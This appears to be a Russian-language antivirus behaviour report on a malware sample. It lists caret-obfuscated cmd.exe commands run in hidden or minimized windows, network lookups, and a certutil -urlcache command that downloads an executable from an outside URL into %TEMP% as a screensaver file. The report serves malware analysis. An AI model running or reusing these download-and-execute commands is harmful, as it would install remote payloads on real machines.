Техническая информация
- '<SYSTEM32>\cmd.exe' /C ^S^t^a^r^t^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^b^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^m^I^n^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^^^C^...
- 'vi#.#ypothes.is':443
- DNS ASK vi#.#ypothes.is
- '<SYSTEM32>\cmd.exe' /C ^S^t^a^r^t^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^b^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^m^I^n^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^^^C^...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" Start /b /mIn ^C^E^rt^u^TiL^.^exE -UrLCaCHE /SPlit -F https:/...
- '<SYSTEM32>\cmd.exe' /StarT /b /mIn pInG
- '<SYSTEM32>\certutil.exe' -UrLCaCHE /SPlit -F https://via.hypothes.is/boyama.medyanef.com/vendor/phpunit/phpunit/src/Util/Log/Hmizdei3.exe %TEMP%\SupermanL.scr